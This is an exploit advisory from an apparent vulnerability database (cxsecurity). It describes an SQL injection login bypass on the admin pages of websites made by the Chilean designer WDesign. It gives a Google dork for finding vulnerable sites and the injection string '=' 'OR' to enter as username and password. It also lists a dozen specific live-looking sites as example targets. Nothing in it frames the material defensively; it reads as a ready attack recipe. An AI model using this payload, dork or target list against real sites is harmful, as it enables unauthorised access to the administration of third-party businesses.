Diseñado por WDesign Admin Page Bypass

2016.04.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # Exploit Title : Diseñado por WDesign Admin Page Bypass # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.wdesign.cl # Google Dork : intext:"Diseñado por WDesign" # Date: 05 04 2016 # Tested On : Kali / iceweasel # Contact: n3t.hacker@gmail.com ###################### # # Search dork and select Target , put /admin after url such as : http://site.com/admin # Now enter fill username and password like the information below : # Username : '=' 'OR' # Password : '=' 'OR' # # e.g: # http://www.albertorocco.cl/admin/ # http://www.capia.cl/admin/ # http://www.bancoadnbovino.cl/admin/ # http://www.rucamalen.cl/admin/ # http://www.inmobisur.cl/admin/ # http://www.autotrans.cl/admin/ # http://www.purotoro.com/admin/ # http://www.luzpropiedades.cl/admin/ # http://www.2arquitectas.cl/admin/ # http://www.decoserviceltda.cl/admin/ # http://www.mueblesgavisuarez.cl/admin/ # http://www.congresosyeventos.cl/admin/ # # ###################### # discovered by : Net Hacker ######################


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top